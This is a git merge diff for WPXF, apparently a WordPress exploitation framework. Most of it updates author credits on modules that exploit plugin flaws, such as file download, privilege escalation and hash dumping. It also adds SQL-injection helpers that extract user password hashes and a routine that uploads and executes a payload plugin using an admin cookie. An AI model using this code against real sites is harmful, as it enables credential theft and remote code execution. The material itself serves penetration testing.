Merge branch 'development'

Author: rastating

VERSION

@@ -1 +1 @@
-1.8
+1.8.1

lib/wpxf/wordpress/hash_dump.rb

@@ -29,9 +29,14 @@ def reveals_one_row_per_request
     false
   end
 
+  # @return [Array] an array of values to use in the generated union statement.
+  def hashdump_custom_union_values
+    []
+  end
+
   # @return [String] a unique SQL select statement that can be used to extract the hashes.
   def hashdump_sql_statement
-    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols = hashdump_union_cols
     cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{eof_token})"
 
     query = "select #{cols.join(',')} from #{table_prefix}users"
@@ -40,9 +45,9 @@ def hashdump_sql_statement
     "#{query} limit #{current_row},1"
   end
 
-  # @return [String] a unique SEL select statement that can be used to fingerprint the database prefix.
+  # @return [String] a unique select statement that can be used to fingerprint the database prefix.
   def hashdump_prefix_fingerprint_statement
-    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols = hashdump_union_cols
     cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,table_name,0x3a,#{eof_token})"
 
     query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
@@ -100,7 +105,7 @@ def run
 
     @current_row = 0
     emit_info 'Dumping user hashes...'
-    hashes = dump_and_parse_hashes
+    hashes = dump_and_parse_hashes.uniq
     output_hashdump_table(hashes)
 
     export_hashes(hashes) if export_path
@@ -109,6 +114,16 @@ def run
 
   private
 
+  def hashdump_union_cols
+    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+
+    hashdump_custom_union_values.each_with_index do |value, index|
+      cols[index] = value unless value.nil?
+    end
+
+    cols
+  end
+
   def bof_token
     @bof_token
   end

lib/wpxf/wordpress/plugin.rb

@@ -7,9 +7,12 @@ module Wpxf::WordPress::Plugin
   # @return [String, nil] the nonce, nil on error.
   def wordpress_plugin_upload_nonce(cookie)
     res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
-    if res && res.code == 200
+
+    if res&.code == 200
       return res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
     end
+
+    nil
   end
 
   # Create and upload a plugin that encapsulates the current payload.
@@ -22,11 +25,29 @@ def wordpress_upload_payload_plugin(name, payload_name, cookie)
     return false if nonce.nil?
 
     res = wordpress_upload_plugin(name, payload_name, cookie, nonce)
-    if res && res.code == 200
-      return true
-    else
-      return false
+    res&.code == 200
+  end
+
+  # Upload and execute a payload as a plugin.
+  # @param plugin_name [String] the name of the plugin.
+  # @param payload_name [String] the name the payload should use on the server.
+  # @param cookie [String] a valid admin session cookie.
+  # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the request.
+  def wordpress_upload_and_execute_payload_plugin(plugin_name, payload_name, cookie)
+    unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
+      emit_error 'Failed to upload the payload'
+      return nil
     end
+
+    payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    emit_info "Executing the payload at #{payload_url}..."
+    res = execute_get_request(url: payload_url)
+
+    if res&.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+
+    res
   end
 
   # Generate a valid WordPress plugin header / base file.

lib/wpxf/wordpress/urls.rb

@@ -123,4 +123,9 @@ def wordpress_url_rest_api
   def wordpress_url_comments_post
     normalize_uri(full_uri, 'wp-comments-post.php')
   end
+
+  # @return [String] the admin / plugin options URL.
+  def wordpress_url_admin_options
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
 end

modules/auxiliary/ad_widget_php_file_download.rb

@@ -9,7 +9,7 @@ def initialize
     update_info(
       name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating' # WPXF module
       ],
       references: [
         ['WPVDB', '8789']

modules/auxiliary/all_in_one_migration_export.rb

@@ -14,8 +14,8 @@ def initialize
         All-in-One Migration plugin in versions < 2.0.5.
       ),
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '7857'],

modules/auxiliary/antioch_arbitrary_file_download.rb

@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Antioch Theme Arbitrary File Download',
       author: [
-        'Ashiyane Digital Security Team',  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Ashiyane Digital Security Team', # Disclosure
+        'rastating'                       # WPXF module
       ],
       references: [
         ['WPVDB', '8406']

modules/auxiliary/candidate_application_form_arbitrary_file_download.rb

@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Candidate Application Form Arbitrary File Download',
       author: [
-        'Larry W. Cashdollar',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['EDB', '37754']

modules/auxiliary/cp_image_store_arbitrary_file_download.rb

@@ -14,8 +14,8 @@ def initialize
         file accessible by the user the web server is running as.
       ),
       author: [
-        'Joaquin Ramirez Martinez',        # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Joaquin Ramirez Martinez', # Disclosure
+        'rastating'                 # WPXF module
       ],
       references: [
         ['EDB', '37559']

modules/auxiliary/custom_contact_forms_privilege_escalation.rb

@@ -13,8 +13,8 @@ def initialize
             '5.1.0.3, allows unauthenticated users to create new admin users '\
             'due to lack of validation when uploading SQL files.',
       author: [
-        'Marc-Alexandre Montpas',          # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
       ],
       references: [
         ['URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html'],

modules/auxiliary/direct_download_for_woocommerce_file_download.rb

@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Direct Download for WooCommerce <= 1.15 File Download',
       author: [
-        'Diego Celdran Morell',           # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Diego Celdran Morell', # Disclosure
+        'rastating'             # WPXF module
       ],
       references: [
         ['WPVDB', '8724']

modules/auxiliary/download_manager_authenticated_privilege_escalation.rb

@@ -12,8 +12,8 @@ def initialize
             'allows authenticated users to escalate their user role to '\
             'that of an administrator.',
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8365'],

modules/auxiliary/download_manager_directory_listing_disclosure.rb

@@ -16,8 +16,8 @@ def initialize
             'versions < 2.8.3 of the Download Manager plugin to get '\
             'the directory listing of the specified directory.',
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8365'],

modules/auxiliary/download_manager_privilege_escalation.rb

@@ -15,8 +15,8 @@ def initialize
             'allows unauthenticated users to create new admin users '\
             'due to lack of validation wpdm_ajax_call_exec.',
       author: [
-        'Mickael Nadeau',                 # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Mickael Nadeau', # Vulnerability discovery
+        'rastating'       # WPXF module
       ],
       references: [
         ['EDB', '35533'],

modules/auxiliary/download_monitor_log_export.rb

@@ -15,8 +15,8 @@ def initialize
         includes: Download ID, Version ID, Filename, User ID, User Login, User Email, User IP, User Agent, Date, Status
       ),
       author: [
-        'James Golovich',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'James Golovich', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8810']

modules/auxiliary/duplicator_csrf_db_export.rb

@@ -15,8 +15,8 @@ def initialize
         visits the generated web page.
       ),
       author: [
-        'RatioSec Research',              # Discovery and disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'RatioSec Research', # Discovery and disclosure
+        'rastating'          # WPXF module
       ],
       references: [
         ['WPVDB', '8388'],

modules/auxiliary/easy_cart_privilege_escalation.rb

@@ -22,7 +22,7 @@ def initialize
             'a new account with admin privileges via the default registration '\
             'page found at /wp-login.php?action=register.',
       author: [
-        'Rob Carr <rob[at]rastating.com>' # Discovery and WPXF module
+        'rastating' # Discovery and WPXF module
       ],
       references: [
         ['CVE', '2015-2673'],

modules/auxiliary/email_users_csrf_bulk_mail.rb

@@ -12,8 +12,8 @@ def initialize
             'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
             'all users of a specified role.',
       author: [
-        'Julien Rentrop',                  # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Julien Rentrop', # Disclosure
+        'rastating'       # WPXF module
       ],
       references: [
         ['WPVDB', '8601'],

modules/auxiliary/events_hash_dump.rb

@@ -15,8 +15,8 @@ def initialize
         to dump the hashed passwords of all users in the database.
       ),
       author: [
-        'Lenon Leite',                     # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Lenon Leite', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8954'],

modules/auxiliary/gallery_album_hash_dump.rb

@@ -15,8 +15,8 @@ def initialize
         to dump the hashed passwords of all users in the database.
       ),
       author: [
-        'Manuel Garcia Cardenas',          # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Manuel Garcia Cardenas', # Disclosure
+        'rastating'               # WPXF module
       ],
       references: [
         ['WPVDB', '8907'],

modules/auxiliary/ghost_unrestricted_export_download.rb

@@ -12,8 +12,8 @@ def initialize
             '<= 0.5.5 of the Ghost plugin to download an export of the WordPress '\
             'data, including usernames and e-mail addresses.',
       author: [
-        'Josh Brody',                      # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Josh Brody', # Disclosure
+        'rastating'   # WPXF module
       ],
       references: [
         ['WPVDB', '8479']

modules/auxiliary/history_collection_arbitrary_file_download.rb

@@ -14,8 +14,8 @@ def initialize
         file accessible by the user the web server is running as.
       ),
       author: [
-        'Kuroi\'SH',                      # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Kuroi\'SH', # Disclosure
+        'rastating'  # WPXF module
       ],
       references: [
         ['EDB', '37254']

modules/auxiliary/imdb_profile_widget_arbitrary_file_download.rb

@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'IMDb Profile Widget <= 1.0.8 Arbitrary File Download',
       author: [
-        'CrashBandicot @DosPerl',          # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'CrashBandicot @DosPerl', # Disclosure
+        'rastating'               # WPXF module
       ],
       references: [
         ['WPVDB', '8426'],

modules/auxiliary/jtrt_responsive_tables_hash_dump.rb

@@ -16,8 +16,8 @@ def initialize
         of all users in the database.
       ),
       author: [
-        'Lenon Leite',                    # Disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Lenon Leite', # Disclosure
+        'rastating'    # WPXF module
       ],
       references: [
         ['WPVDB', '8953'],

modules/auxiliary/long_password_dos.rb

@@ -16,9 +16,9 @@ def initialize
             'of service via a long password that is improperly handled during '\
             'hashing.',
       author: [
-        'Javier Nieto Arevalo', # Vulnerability disclosure
+        'Javier Nieto Arevalo',  # Vulnerability disclosure
         'Andres Rojas Guerrero', # Vulnerability disclosure
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'rastating'              # WPXF module
       ],
       references: [
         ['CVE', '2014-9034'],

modules/auxiliary/mail_masta_unauthenticated_local_file_inclusion.rb

@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Mail Masta Unauthenticated Local File Inclusion',
       author: [
-        'Guillermo Garcia Marcos',         # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Guillermo Garcia Marcos', # Disclosure
+        'rastating'                # WPXF module
       ],
       desc: 'This module exploits a vulnerability which allows you to include any arbitrary file '\
             'accessible by the user the web server is running as into the executing script.',

modules/auxiliary/membership_simplified_arbitrary_file_download.rb

@@ -14,8 +14,8 @@ def initialize
         in order to bypass mitigation within the plugin.
       ),
       author: [
-        'Larry W. Cashdollar',             # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
       ],
       references: [
         ['CVE', '2017-1002008'],

modules/auxiliary/memphis_documents_library_arbitrary_file_download.rb

@@ -9,8 +9,8 @@ def initialize
     update_info(
       name: 'Memphis Documents Library <= 3.1.5 Arbitrary File Download',
       author: [
-        'Felipe Molina',                   # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'Felipe Molina', # Disclosure
+        'rastating'      # WPXF module
       ],
       references: [
         ['WPVDB', '8419']

modules/auxiliary/platform_privilege_escalation.rb

@@ -21,8 +21,8 @@ def initialize
             'privileges via the default registration page found at '\
             '/wp-login.php?action=register.',
       author: [
-        'Marc-Alexandre Montpas',         # Vulnerability discovery
-        'Rob Carr <rob[at]rastating.com>' # WPXF module
+        'Marc-Alexandre Montpas', # Vulnerability discovery
+        'rastating'               # WPXF module
       ],
       references: [
         ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],

modules/auxiliary/post_grid_file_deletion.rb

@@ -12,8 +12,8 @@ def initialize
             'the Post Grid plugin which allows you to delete any arbitrary '\
             'file accessible by the user the web server is running as.',
       author: [
-        'White Fir Design',                # Disclosure
-        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+        'White Fir Design', # Disclosure
+        'rastating'         # WPXF module
       ],
       references: [
         ['WPVDB', '8667'],